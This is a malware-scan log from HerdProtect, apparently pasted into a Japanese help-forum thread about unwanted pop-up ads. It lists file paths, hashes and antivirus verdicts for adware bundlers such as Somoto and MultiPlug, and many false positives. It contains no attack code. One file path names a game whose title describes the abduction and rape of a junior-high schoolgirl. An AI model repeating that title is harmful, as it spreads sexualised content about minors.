SHA-1: cf227d4aa26882dee86fbfa301d3342833ddbc7c
Created: 2013/01/27 5:39:25
Detections: 28
Determination: Adware
- MicroWorld eScan as Application.Bundler.Somoto.I (Undefined)
- Malwarebytes as PUP.Optional.Somoto (Adware)
- K7 AntiVirus as Trojan (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- NANO AntiVirus as Trojan.Win32.Agent.cruvhh (Undefined)
- F-Prot as W32/SomotoBetterInstaller.A (Adware)
- avast! as Win32:Somoto-F [PUP] (Adware)
- Clam AntiVirus as Adware.Somoto-1 (Adware)
- Kaspersky as not-a-virus:Downloader.NSIS.Agent (Adware)
- Bitdefender as Application.Bundler.Somoto.I (Undefined)
- Agnitum Outpost as PUA.Somoto (Adware)
- SUPERAntiSpyware as Adware.Somoto (Adware)
- Lavasoft Ad-Aware as Application.Bundler.Somoto.I (Undefined)
- Comodo Security as Application.Win32.Somoto.A (Adware)
- F-Secure as Application.Bundler.Somoto (Undefined)
- Dr.Web as Adware.Somoto.17 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- McAfee Web Gateway as Artemis (Undefined)
- Sophos as Somoto BetterInstaller (Adware)
- Avira AntiVirus as APPL/Somoto.Gen2 (Adware)
- Antiy Labs AVL as Trojan/Win32.Tgenic (Undefined)
- AhnLab V3 Security as Win-PUP/Somoto (Undefined)
- G Data as Application.Bundler.Somoto (Undefined)
- Vba32 AntiVirus as Signed-AdWare.BetterInternet.SomotoLtd (Adware)
- ESET NOD32 as Win32/Somoto (Undefined)
- AVG as AdInstaller.Somoto (Undefined)
- Qihoo 360 Security as Win32/Virus.Downloader.832 (Undefined)
- Reason Heuristics as Threat.Somoto.BetterInstaller.Installer (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\vlcmediaplayersetup.exe
Publisher:
Signer: Somoto Ltd.
MD5: 2ad04f5097a32f57aa2dbf7ab75a75ef
SHA-1: e34d5c2f12b11f986551803547bef99f15172b01
Created: 2012/10/31 19:02:10
Detections: 8
Determination: Adware
- Trend Micro House Call as TROJ_GEN.F47V0801 (Undefined)
- Clam AntiVirus as Win.Adware.BetterInstaller (Adware)
- SUPERAntiSpyware as Adware.Somoto (Adware)
- Sophos as Somoto BetterInstaller (Adware)
- Dr.Web as Adware.Somoto.8 (Adware)
- ESET NOD32 as Win32/Somoto (variant) (Undefined)
- Fortinet FortiGate as Riskware/Somoto.XA (Undefined)
- Reason Heuristics as Threat.Somoto.BetterInstaller.Installer (Adware)
  • かなは
  • 2015/04/21 (Tue) 17:02:37
Re: Pop-ups and ads are being forcibly displayed, and it is causing me trouble.
HP log 2

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\kirisame1.07\game.exe
Publisher:
MD5: bd9ebb7d09f9111a9f0a0ba2238eaf80
SHA-1: 28c753124d845f61373be87d392ab839914ebdc5
Created: 2012/06/22 21:45:22
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.KillAV.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\downloads\tyabandeath_v1_00\game.exe
Publisher:
MD5: bd9ebb7d09f9111a9f0a0ba2238eaf80
SHA-1: 28c753124d845f61373be87d392ab839914ebdc5
Created: 2014/02/26 22:54:32
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.KillAV.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\herdprotectscan_setup.exe
Publisher: Reason Company Software Inc.
Signer: Reason Software Company Inc.
MD5: 172ed33198484df87fa015b695eaad80
SHA-1: 1df2124a741afc2ee0b2e90e904a3201e5cb3c3d
Created: 2015/04/20 21:53:24
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.ArcadeWeb!6.727 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\otl.exe
Publisher: OldTimer Tools
MD5: 4adcfee16ee9978f06157634669d36fb
SHA-1: 30b37076552e49276836d02dd73d038c27dbbee9
Created: 2015/04/20 21:57:24
Detections: 2
Determination: Ignore detections (false positive)
- Agnitum Outpost as Packed/PECompact
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\amarecco310c\amv300i\setup.exe
Publisher:
MD5: 5bed35d2b0191e65542ca23dfccba973
SHA-1: 2e33d594bda79d346d685c303c9d4102c72fd4e7
Created: 2013/08/21 22:50:20
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\amarecco310c\verup106\ver106pach\bbb.exe
Publisher:
MD5: e77fdf2e781514d1174c4008ef78b3a2
SHA-1: 1a0b3afef96b5d7e271526089b9163dd378021c2
Created: 2013/07/27 16:00:36
Detections: 1
Determination: Ignore detections (false positive)
- Sunbelt AntiMalware as VIPRE.Suspicious (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\imoona_sample.exe
Publisher:
MD5: d0fbd1efc5b84eac16a5ed2dd5b9131d
SHA-1: 12d453da3c05368175146abec512e8ca83b51d79
Created: 2013/05/04 5:22:43
Detections: 3
Determination: UndefinedMalware
- Norman as Crypt.AUPI (Undefined)
- Antiy Labs AVL as Trojan/Win32.SGeneric (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\utorrent.exe
Publisher: BitTorrent, Inc.
Signer: BitTorrent Inc
MD5: 88155d3d23ca8a1dfb1f45ee3e4c8df8
SHA-1: 3176d4803e93f04fb2a4882d78ee4117650b8a32
Created: 2013/01/28 14:53:55
Detections: 3
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan/Win32.Patched.gen (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Strictor.46875 (Undefined)
- Trend Micro House Call as HV_ZYX_BL132900.TOMC (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\sinyujk_tr.exe
Publisher:
MD5: 0bb00f13cd86d760029db95583c55e67
SHA-1: 570d8e0edc9a79a439adbc5594164b4a58fcfca2
Created: 2013/03/09 4:30:09
Detections: 3
Determination: Inconclusive
- Vba32 AntiVirus as Worm.Win32.Huhk.d (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0617 (Undefined)
- F-Secure as Adware.SwiftBrowse.CR (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin\dirlist.dll
Publisher:
MD5: 5e4df0c4cf4a8974e6d045abc7704bb1
SHA-1: bac1f1f0dd8de786c4c86ca5b5a2ae388432e956
Created: 2013/03/09 4:30:09
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/Downloader.VB.oxh (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin\lineparser.dll
Publisher:
MD5: 5d89819d0d2269d26afd342557a0d5e1
SHA-1: fba2656056babddf9502bd41b77a358b88c1a28a
Created: 2013/03/09 4:30:09
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.Ponmocup!6.C76 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\dolphin-3.5-x64\dolphin.exe
Publisher:
MD5: 1bd6602306992dedeff0cd5c17857829
SHA-1: f43cba8957d587115b5ab289bd79ce22a3701ca7
Created: 2013/01/27 5:35:47
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Backdoor.Win32.A.Hupigon.12871680 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\babel19sample\jc拉致監禁レイプ_体験版\jc拉致監禁レイプ_体験版.exe
Publisher:
MD5: 7f791283a04bb07427e4c95ed8a2e48a
SHA-1: efe9203c23a64a9e064dc0953eecf4c3ee251ca4
Created: 2013/06/19 15:25:05
Detections: 3
Determination: Inconclusive
- Vba32 AntiVirus as Worm.Win32.Huhk.d (Undefined)
- Trend Micro House Call as Suspicious_GEN.F47V0617 (Undefined)
- F-Secure as Adware.SwiftBrowse.CR (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\xxxx\kontrapunkt_trial\kontrapunkt.exe
Publisher:
MD5: 7ac08e61337710b6cc548ef69e01adbd
SHA-1: e573d690bd7f2395981d674aeda0a4ae76011b0b
Created: 2013/05/04 5:21:43
Detections: 1
Determination: UndefinedMalware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\amarectv300c\live_setup300.exe
Publisher:
MD5: fb824c501456ce3a522eb5b1f9bdfcc0
SHA-1: 40360972c5d766c4e39cc71d95aaca83e7337153
Created: 2013/10/28 16:39:11
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\amv300i\setup.exe
Publisher:
MD5: 5bed35d2b0191e65542ca23dfccba973
SHA-1: 2e33d594bda79d346d685c303c9d4102c72fd4e7
Created: 2013/10/28 16:41:34
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.CDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\aviutl100\aviutl.exe
Publisher:
MD5: de77065ce0fde0f0f8231cfe47a49c66
SHA-1: b83bd94f594a5b2ac585aba86931a8083415f36e
Created: 2014/02/14 23:52:36
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Part.a (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\chorokuf\chosche.exe
Publisher:
MD5: 315e1f3445df0fbaf397fd7c3d60feea
SHA-1: 54a2039918d2f79c0f377779bd3dd2fe5e62e696
Created: 2005/07/14 5:04:25
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Laneul (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe
Publisher: web technology Corp.
http://www.webtech.co.jp/exepress/
MD5: b189bd00021e72894cf77ccc95270710
SHA-1: cbf5d4259f866d75863a1c1c0f27b028b2ae1aee
Created: 2005/03/16 10:24:54
Detections: 1
Determination: Inconclusive
- Sophos as CnsMin (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\ib_1.05\ib_1.05.exe
Publisher:
MD5: fb8a6dffa0bcc42b7d5aefc37d87357f
SHA-1: ce08659427366a7d87557f1d9a8955f068811337
Created: 2013/10/28 16:33:24
Detections: 2
Determination: Inconclusive
- Sophos as Mal/EncPk-ACO (Undefined)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\l-smash_works_r708_plugin-set\vapoursynth\vslsmashsource.dll
Publisher:
MD5: 83cdfc7b169d9934766948e920fd5dc8
SHA-1: 86d75563cd89d441a2a5307b3e694b564aaed1f7
Created: 2014/02/14 23:53:58
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\l-smash_works_r708_plugin-set (1)\vapoursynth\vslsmashsource.dll
Publisher:
MD5: 83cdfc7b169d9934766948e920fd5dc8
SHA-1: 86d75563cd89d441a2a5307b3e694b564aaed1f7
Created: 2014/11/23 3:09:42
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\jabo_dinput.dll
Publisher: Project64
MD5: d5f798c360aaac128b0fc4a211688ccd
SHA-1: 4b55d92fda42f108bd0e22503afd905754e95caf
Created: 2014/11/13 21:58:44
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\jabo_direct3d8.dll
Publisher: Project64
MD5: ff57f60c58ede6364b980edcb311873b
SHA-1: 5ec6e231f780d9eafa6ee855e0f4968a7f8c347d
Created: 2014/11/13 21:58:44
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\project64\plugin\nrage_dinput8_v2.dll
Publisher: Gbs
MD5: f5296ecc4d6ea5605291de9203032a82
SHA-1: 8e72558a56adb82f3ed939c39f67718a0068400e
Created: 2014/11/13 21:58:45
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Packed/Win32.Klone.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\rtpセットアップ\rpg2000rtp.exe
Publisher: InstallShield Software Corporation
MD5: f745653bbee5ba9a6725a874a43386d5
SHA-1: f5ddcf5285ee5e4d663dceb059059dd2931cf9e3
Created: 2013/10/28 16:33:29
Detections: 1
Determination: Ignore detections (false positive)
- Comodo Security as Heur.Suspicious

---------------------------------------------------------------------------------

File path: c:\users\ryota\desktop\実況\黒先輩ver1.05\game.exe
Publisher:
MD5: c22b8d8acb738776d94ea0cc10277144
SHA-1: 4dcc713487826be8c67f614d0f90b0ab59d2215c
Created: 2014/04/30 16:01:29
Detections: 3
Determination: Inconclusive
- Bkav FE as W32.Clod248.Trojan (Undefined)
- The Hacker as Backdoor/SdBot.ysj (Undefined)
- ViRobot as Trojan.Win32.A.ShipUp.69632.M (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\ctregrun.exe
Publisher: Creative Technology Ltd
MD5: a8d72b3c7e20f2bb67cc60bcad4e9138
SHA-1: ec3ca8c41171fd9242e2411e6a571bd15f164e04
Created: 2012/10/31 18:21:39
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.CreativeTechnology.I

---------------------------------------------------------------------------------

File path: c:\windows\eiunin21.exe
Publisher: nobukichi
MD5: 7895ff5002fea700230af61b7defb12a
SHA-1: 54cb2c99d06bee335962b1aacb507bcf418f5948
Created: 2014/02/14 3:27:53
Detections: 2
Determination: Ignore detections (false positive)
- eSafe as Suspicious File
- Comodo Security as Heur.Packed.Unknown

---------------------------------------------------------------------------------

File path: c:\windows\frontier_1920x1080_ss.scr
Publisher: Jan Kolarik & Ondrej Vaverka
MD5: 7234fea58fe972e8d1b3d96dec67fbc5
SHA-1: 356a8ac6c80fe2fa4876f24ca849e547110d3bec
Created: 2012/10/31 9:10:21
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Heur.i

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\divx.dll
Publisher: DivX, Inc.
MD5: f42e95bfb193754e9148db6434d2e88e
SHA-1: f7e2bbebb5efee13b3c8df04d4983a089abf011d
Created: 2010/02/20 4:27:36
Detections: 1
Determination: Ignore detections (false positive)
- CMC Antivirus as Packed.Win32.PolyCrypt.2!O

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\dsnpstd.ax
Publisher:
MD5: 27190c5d44977ed9df049c0729efa3a1
SHA-1: e8b59166ee15db1beeaa9ca4bf9610ec10982234
Created: 2012/11/06 16:20:48
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Trojan[Downloader]/Win32.Banload (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\ext-ms-win-cluster-clusapi-l1-1-1.dll
Publisher: Microsoft Corporation
MD5: 6f5557e3f97cb2a957da5dcdaf1e22c1
SHA-1: c2a27e776fbfc3666642425dcc5f2b34bb41cb10
Created: 2013/08/22 13:14:14
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Backdoor/Bifrose.fxu (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\syswow64\kbdcherp.dll
Publisher: Microsoft Corporation
MD5: f992fe1d923f59f806442449f3ea557b
SHA-1: d216f5bc5d466c1c9d94aa57a28c5226b214bdbc
Created: 2013/08/22 13:15:06
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/Kryptik.ahcy (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\adobe\arm\reader_11.0.00\16129\adobearm.exe
Publisher: Adobe Systems Incorporated
Signer: Adobe Systems, Incorporated
MD5: 3cb07566302bceeb898de270a0bec175
SHA-1: 3c79cfc02e2e9877e164d1a7e856fa6bddb34c2f
Created: 2012/12/03 16:35:28
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.Sality!6.EDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\adobe\arm\reader_11.0.00\16129\adobearm.exe
Publisher: Adobe Systems Incorporated
Signer: Adobe Systems, Incorporated
MD5: 3cb07566302bceeb898de270a0bec175
SHA-1: 3c79cfc02e2e9877e164d1a7e856fa6bddb34c2f
Created: 2012/12/03 16:35:28
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.Sality!6.EDB (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\cjhlcgankhfaeohlngbhkhbnhmhaokmc\manifest.json
Publisher:
MD5: ebb718d9043c987b2a05265acfab9493
SHA-1: df01f0e262d5b287a78c4d7eadfe7ed7eadd9cd9
Created: 2015/02/25 17:39:32
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.UnIDealsi (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
Publisher: SoftWarehouse
MD5: 156e10be1df7468b247c4a6f629b1c9e
SHA-1: b84da289fa8bec345109ac49e4ec6754179efc49
Created: 2014/01/12 15:35:07
Detections: 24
Determination: Adware
- Bkav FE as W32.Clodd20.Trojan (Undefined)
- Trend Micro House Call as TROJ_GEN.R0CBH07A214 (Undefined)
- Kaspersky as not-a-virus:Downloader.Win32.AdLoad (Adware)
- IKARUS anti.virus as not-a-virus:Downloader.Win32.AdLoad (Adware)
- Baidu Antivirus as HackTool.Win32.AdLoad
- ESET NOD32 as Win32/InstalleRex (Undefined)
- Antiy Labs AVL as Downloader/Win32.AdLoad (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- McAfee as Artemis!484F9D098F42 (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- McAfee Web Gateway as Artemis!484F9D098F42 (Undefined)
- Sophos as Generic PUA AO (Undefined)
- NANO AntiVirus as Trojan.Win32.AntiFW.ctihds (Undefined)
- Agnitum Outpost as PUA.Downloader (Adware)
- Comodo Security as ApplicUnwnt.Win32.AdWare.InstallRex.VLD (Adware)
- Dr.Web as Adware.Downware.2108 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R0CBC0EAN14 (Undefined)
- Jiangmin as Trojan/AntiFW.a (Undefined)
- Vba32 AntiVirus as Downloader.AdLoad (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Fortinet FortiGate as Riskware/Adload (Undefined)
- AVG as Downloader.Generic13 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\setup.exe
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: e717f6ce3a7429bfa6d7f3cf66737a4b
SHA-1: 01f4042589b4ed88c351ffeac256be7a9d884818
Created: 2014/01/12 15:35:07
Detections: 2
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1
- Emsisoft Anti-Malware as Gen:Variant.Symmi.36268 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\tsudll.dll
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: af7ce801c8471c5cd19b366333c153c4
SHA-1: 4267749d020a362edbd25434ad65f98b073581f1
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as Downware.TSU (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\_setup.dll
Publisher:
MD5: d8bbf8e88cf9821dd260f2c41505344a
SHA-1: 4a527f16683c49f70f613ee2ed7185f164ff8df7
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as Trojan.Agent/Gen-Sefnit (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\neopleplugin\npneoplegameinstaller.dll
Publisher:
Signer: Neople Inc.
MD5: c3517e56484ee9a628e4d30553ee53cd
SHA-1: 395542a67a1c8304b1bbcd75ba737d90e3624b47
Created: 2014/01/21 0:49:30
Detections: 1
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0305 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\battle network rockman exe 3 black (japan) (v1.1).exe
Publisher:
MD5: 9fbf58ca57aed93ae81da013e20a1e02
SHA-1: d3c3ed674c540b48164f0d962a7e574e7d0be385
Created: 2014/02/25 17:39:09
Detections: 28
Determination: Adware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)
- Dr.Web as Trojan.DownLoader12.31680 (Undefined)
- F-Secure as Gen:Variant.Adware.Mikey (Adware)
- avast! as Win32:MultiPlug-WR [PUP] (Adware)
- McAfee as Program.MultiPlug-FXE (Adware)
- VIPRE Antivirus as Threat.5085665 (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FC application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Mikey.8516 (Adware)
- Norman as Gen:Variant.Adware.Strictor.61661 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Mikey.8516 (Adware)
- MicroWorld eScan as Gen:Variant.Adware.Mikey.8516 (Adware)
- Malwarebytes as PUP.Optional.Unizeto (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.213923 (Adware)
- NANO AntiVirus as Riskware.Win32.MultiPlug.dojkok (Adware)
- F-Prot as W32/S-fe152cf5 (Undefined)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Mikey.8516 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VA (Adware)
- McAfee Web Gateway as BehavesLike.Win32.MultiPlug.tc (Undefined)
- Jiangmin as AdWare/MultiPlug.dkxa (Adware)
- Avira AntiVirus as ADWARE/MultiPlug.Gen (Adware)
- Antiy Labs AVL as GrayWare[AdWare:not-a-virus]/Win32.MultiPlug (Adware)
- G Data as Gen:Variant.Adware.Mikey.8516 (Adware)
- Vba32 AntiVirus as SScope.Adware.MultiPlug (Adware)
- Rising Antivirus as PE:AdWare.Win32.MultiPlug.s!1075356738 (Adware)
- Fortinet FortiGate as Riskware/Badur (Undefined)
- AVG as Generic6 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll
Publisher: SoftWarehouse
MD5: 156e10be1df7468b247c4a6f629b1c9e
SHA-1: b84da289fa8bec345109ac49e4ec6754179efc49
Created: 2014/01/12 15:35:07
Detections: 24
Determination: Adware
- Bkav FE as W32.Clodd20.Trojan (Undefined)
- Trend Micro House Call as TROJ_GEN.R0CBH07A214 (Undefined)
- Kaspersky as not-a-virus:Downloader.Win32.AdLoad (Adware)
- IKARUS anti.virus as not-a-virus:Downloader.Win32.AdLoad (Adware)
- Baidu Antivirus as HackTool.Win32.AdLoad
- ESET NOD32 as Win32/InstalleRex (Undefined)
- Antiy Labs AVL as Downloader/Win32.AdLoad (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Generic.a.(kcloud) (Undefined)
- McAfee as Artemis!484F9D098F42 (Undefined)
- K7 AntiVirus as Trojan (Undefined)
- K7 Gateway Antivirus as Trojan (Undefined)
- McAfee Web Gateway as Artemis!484F9D098F42 (Undefined)
- Sophos as Generic PUA AO (Undefined)
- NANO AntiVirus as Trojan.Win32.AntiFW.ctihds (Undefined)
- Agnitum Outpost as PUA.Downloader (Adware)
- Comodo Security as ApplicUnwnt.Win32.AdWare.InstallRex.VLD (Adware)
- Dr.Web as Adware.Downware.2108 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R0CBC0EAN14 (Undefined)
- Jiangmin as Trojan/AntiFW.a (Undefined)
- Vba32 AntiVirus as Downloader.AdLoad (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Fortinet FortiGate as Riskware/Adload (Undefined)
- AVG as Downloader.Generic13 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\setup.exe
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: e717f6ce3a7429bfa6d7f3cf66737a4b
SHA-1: 01f4042589b4ed88c351ffeac256be7a9d884818
Created: 2014/01/12 15:35:07
Detections: 2
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Malware.XPACK/RDM!5.1
- Emsisoft Anti-Malware as Gen:Variant.Symmi.36268 (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\tsudll.dll
Publisher: Tarma Software Research Pty Ltd
Signer: Tarma Software Research Pty Ltd
MD5: af7ce801c8471c5cd19b366333c153c4
SHA-1: 4267749d020a362edbd25434ad65f98b073581f1
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- Vba32 AntiVirus as Downware.TSU (Adware)

---------------------------------------------------------------------------------

File path: c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\_setup.dll
Publisher:
MD5: d8bbf8e88cf9821dd260f2c41505344a
SHA-1: 4a527f16683c49f70f613ee2ed7185f164ff8df7
Created: 2014/01/12 15:35:07
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as Trojan.Agent/Gen-Sefnit (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\battle network rockman exe 3 black (japan) (v1.1).exe
Publisher:
MD5: 9fbf58ca57aed93ae81da013e20a1e02
SHA-1: d3c3ed674c540b48164f0d962a7e574e7d0be385
Created: 2014/02/25 17:39:09
Detections: 28
Determination: Adware
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)
- Dr.Web as Trojan.DownLoader12.31680 (Undefined)
- F-Secure as Gen:Variant.Adware.Mikey (Adware)
- avast! as Win32:MultiPlug-WR [PUP] (Adware)
- McAfee as Program.MultiPlug-FXE (Adware)
- VIPRE Antivirus as Threat.5085665 (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FC application (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Mikey.8516 (Adware)
- Norman as Gen:Variant.Adware.Strictor.61661 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Mikey.8516 (Adware)
- MicroWorld eScan as Gen:Variant.Adware.Mikey.8516 (Adware)
- Malwarebytes as PUP.Optional.Unizeto (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.213923 (Adware)
- NANO AntiVirus as Riskware.Win32.MultiPlug.dojkok (Adware)
- F-Prot as W32/S-fe152cf5 (Undefined)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Mikey.8516 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VA (Adware)
- McAfee Web Gateway as BehavesLike.Win32.MultiPlug.tc (Undefined)
- Jiangmin as AdWare/MultiPlug.dkxa (Adware)
- Avira AntiVirus as ADWARE/MultiPlug.Gen (Adware)
- Antiy Labs AVL as GrayWare[AdWare:not-a-virus]/Win32.MultiPlug (Adware)
- G Data as Gen:Variant.Adware.Mikey.8516 (Adware)
- Vba32 AntiVirus as SScope.Adware.MultiPlug (Adware)
- Rising Antivirus as PE:AdWare.Win32.MultiPlug.s!1075356738 (Adware)
- Fortinet FortiGate as Riskware/Badur (Undefined)
- AVG as Generic6 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0\manifest.json
Publisher:
MD5: e2832fbedae560495781610b5c511afa
SHA-1: 95f9c6fe1ea5a6ee009bce1e9c215ef53fb5c108
Created: 2014/01/12 15:34:11
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.WebPick.YoutubeAdblocker.ChromePlugin.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7\manifest.json
Publisher:
MD5: 2df44604a8b618be96a265130308516c
SHA-1: 8df8b294612d3e16cc381e101c5b9e35d5fa5013
Created: 2013/01/12 15:33:53
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.JustPlugIt.M (Adware)

---------------------------------------------------------------------------------

